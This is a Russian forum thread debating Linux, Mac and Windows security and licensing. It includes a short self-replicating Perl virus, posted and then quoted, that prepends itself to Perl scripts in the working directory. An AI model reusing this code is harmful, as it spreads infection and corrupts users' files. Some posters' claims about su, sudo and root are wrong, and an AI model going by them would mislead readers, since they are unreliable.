forum.boolean.name

forum.boolean.name (http://forum.boolean.name/index.php)
-   Болтовня (http://forum.boolean.name/forumdisplay.php?f=25)
-   -   В Ставропольском крае государственные учреждения будут переведены на СПО (http://forum.boolean.name/showthread.php?t=13898)

Randomize 20.12.2010 18:00

Ответ: В Ставропольском крае государственные учреждения будут переведены на СПО

Цитата:

Сообщение от ingko (Сообщение 172609)
Ну, нет там вирусов! :-D Не пишут. Не выгодно. А какие и есть, их еще постараться запустить надо и желательно из под рута. :crazy:

А на Macbook-Pro железо вполне топовое. Я уж не говорю про большой Pro. :rolleyes:

PHP код:

#!/usr/bin/perl #PerlDemo

open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);

foreach 
$FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {

open(File"$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))

{ if ((@
Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File">$FileName"); print File @Virus;

print 
File @Tempclose (File); } } } } 

Держи! Это простейший. Обилие скриптов bash, perl, php и тд делают юникс настоящим раем для вирусов. Причём такие вирусы может написать даже школьник. А ежели из под рута сидишь дак в обще разгуляево.

ingko 20.12.2010 18:32

Цитата:

Сообщение от Randomize (Сообщение 172614)
PHP код:

#!/usr/bin/perl #PerlDemo

open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);

foreach 
$FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {

open(File"$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))

{ if ((@
Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File">$FileName"); print File @Virus;

print 
File @Tempclose (File); } } } } 

Держи! Это простейший. Обилие скриптов bash, perl, php и тд делают юникс настоящим раем для вирусов. Причём такие вирусы может написать даже школьник. А ежели из под рута сидишь дак в обще разгуляево.

И как энто запустить? У меня пёрла на машине никогда не было. Только питон. :) И из под рута в линуксе??? :4to: Дык, там парой sudo не работает, а уж войти в систему под рутом - это надо долго извращаться руками! :-D

На баше вообще не написать вирус. :) Поскольку оный запускается всегда из сессии юзера... А "ПеХеПе" тут вообще не причем! Это же не веб-сервер :)

И твой пример можно только запустить руками, да и с правами рута, что в принципе, не возможно обычному юзеру.

Да и вреда от таких "вирусов" - ноль. Машину они заражают только из под сессии юзера. Стоит сессию остановить (даже не перезагружая машину), и всё :)

Taugeshtu 20.12.2010 19:55

Цитата:

а уж войти в систему под рутом - это надо долго извращаться руками!
Садись, два. Slackware 12, root password, xserver start (вроде бы, было это года 3 назад) - и ты под рутом в иксах.

ABTOMAT 20.12.2010 20:05

Цитата:

уж войти в систему под рутом - это надо долго извращаться руками! :-D
sudo passwd root например.
Цитата:

А на Macbook-Pro железо вполне топовое.
Играю на Macbook Pro 2008 г.в. в Халву 2 (2004 г.в., портированная версия [т.е. не эмулятор]) - лагает. Сильно, противно.
Хотя знакомый гамал на iMac'е в Fallout 3 когда тот вышет, грит, без лагов (не знаю, можно ли ему верить в этом вопросе), правда, под виндой. Может, макось на игры так плохо влияет, я не углублялся в этот вопрос.
И да, вирусы на те же маки есть. Один из свеженьких распространялся с одним из кряков Фотошопа КС5 (правда с торрентов быстренько вычистили, я уже не застал). И вряд ли система привилегий юниксов поможет. Юзер скачал кряк для так ему нужного фотошопа. При запуске система спрашивает пароль админа. Действия юзера? Думаю, понятно.
Но вирусов мало, да. Писать под меньшинства никому не выгодно.

ingko 20.12.2010 21:42

Цитата:

Сообщение от Taugeshtu (Сообщение 172623)
Садись, два. Slackware 12, root password, xserver start (вроде бы, было это года 3 назад) - и ты под рутом в иксах.

Мы же говорим о Нормальных Линуксах! :rolleyes: Мы же не Линуксоидасты.

И, кстати, это всё легко блокируется, прописанием прав в соответствующем файле. ;)

Цитата:

Сообщение от ABTOMAT
sudo passwd root например.

В худшем случае, запросит пароль вводить руками... А в лучшем пошлет нас на фиг! :)

cyberblut 21.12.2010 03:05

Цитата:

Сообщение от ingko (Сообщение 172638)
Мы же говорим о Нормальных Линуксах! :rolleyes: Мы же не Линуксоидасты.

Линукс - это ядро, остальное - сборка/ось на основе ядра Линукс. Для получения прав рута есть утилитые в каждом дистрибе. Нех тут чушь нести. Как минимум su. Другое дело, что нормальная практика блокировать рутовский аккаунт и запускать отдельные процессы через sudo. Но на него также распространяются отдельные привелегии, в частном случае - рутовские.
И да. Для получения инфы кроме вирей есть бэкдоры, дырки в безопасности, уязвимости и прочие. НО!! Я свой линь могу ПОЛНОСТЬЮ пересобрать и настроить так, что никакая падла не влезет, на худой конец дырку залатаю, т.к. СПО и все исходники прилагаются. Само собой тотальная настройка идёт в ущерб каким-то функциям. Всегда приходится золотую середину искать. Но на виндоговне я ничего подобного сделать не смогу и близко.
Да, и вы вообще знаете, что за каждого авторизованного пользователя в вин-сервере нужно отдельное лицензионное отчисление платить?

pax 21.12.2010 12:26

Цитата:

Сообщение от cyberblut (Сообщение 172674)
Да, и вы вообще знаете, что за каждого авторизованного пользователя в вин-сервере нужно отдельное лицензионное отчисление платить?

По умолчанию по моему 20 пользователей, дополнительная лицензия дает +5 подключений. Я не очень разбираюсь в сетях, но вроде это не тоже самое, что всего 20 пользователей за раз может обработать сервер через подключение по TCP или UDP. Это вроде число одновременно залогиненных пользователей (доступ к открытым ресурсам/удаленный доступ).

cyberblut 21.12.2010 12:44

http://win-server.ru/p/35
Линукс будет дешевле :)

ingko 21.12.2010 13:49

Цитата:

Сообщение от cyberblut (Сообщение 172674)
Линукс - это ядро, остальное - сборка/ось на основе ядра Линукс. Для получения прав рута есть утилитые в каждом дистрибе. Нех тут чушь нести. Как минимум su. Другое дело, что нормальная практика блокировать рутовский аккаунт и запускать отдельные процессы через sudo. Но на него также распространяются отдельные привелегии, в частном случае - рутовские.

Да, ты в курсе, что su, а тем более sudo не имеют всех прав рута? Это временное делегирование необходимых прав обычному юзеру, и всё. Из под него мало что можно сделать с самой системой.

Кстати, по поводу
Цитата:

sudo passwd root
Я это встречал только в LiveCD-режиме. :) Нигде больше.

cyberblut 21.12.2010 17:51

Цитата:

Сообщение от ingko (Сообщение 172695)
Да, ты в курсе, что su, а тем более sudo не имеют всех прав рута?

Садись, два!

----
man su
----
Программа su используется для того, чтобы пользователь мог стать другим пользователем в текущей сессии. Если su вызывается без имени_пользователя, то это по умолчанию делает пользователя суперпользователем.

ingko 21.12.2010 19:26

Цитата:

Сообщение от cyberblut (Сообщение 172729)
Садись, два!

----
man su
----
Программа su используется для того, чтобы пользователь мог стать другим пользователем в текущей сессии. Если su вызывается без имени_пользователя, то это по умолчанию делает пользователя суперпользователем.

А теперь, послушай меня. :) Если ты, находясь под обычным юзером запускаешь bash, то не спрашивая тебя, он стартует под твоим юзером. Ведь при загруженной системе root уже есть в ней. ;) Загрузчик, конфигурируя ядро и запуская его, отдает root-процессы ядру. Раньше, ядро отдавала права демонам автозапуска (иксам, системным утилитам и т. д.). Сейчас эту потенциальную дырку закрыли. Теперь, root - это своеобразный зомби-процесс, который сам по себе не активен, но есть в системе. Несколько рутов в системе быть не может, в отличае от винды. И если ты Баше скажешь su, он ответит: root is loggin. А sudo действует, как ты знаешь, на одну команду и не в скрипте.

pax 21.12.2010 21:11

Цитата:

Сообщение от cyberblut (Сообщение 172690)
http://win-server.ru/p/35
Линукс будет дешевле :)

Садись, два!

http://nthost.ru/ - что linux, что windows хостинг - цена одна. Super DDS для windows/linux - цена одна.

Нахрена мне эти дополнительные пользователи? Мне одного администратора достаточно.

Randomize 21.12.2010 22:25

Вставай, пять, антивирусы для линукса дураки пишут наверное.
Вставай, пять, Win сервер в редких исключениях равен по цене юниксовому.

m_512 21.12.2010 23:56

Fuuuuu... сегодня узнал... у нас будут лицензию на винду, антивирус и офис продлевать. Эх...

cyberblut 22.12.2010 00:56

Цитата:

Сообщение от pax (Сообщение 172764)
Садись, два!

http://nthost.ru/ - что linux, что windows хостинг - цена одна. Super DDS для windows/linux - цена одна.

Нахрена мне эти дополнительные пользователи? Мне одного администратора достаточно.

При чём тут хостинг вообще??? О.о

Часовой пояс GMT +4, время: 20:21.

vBulletin® Version 3.6.5.
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Перевод: zCarot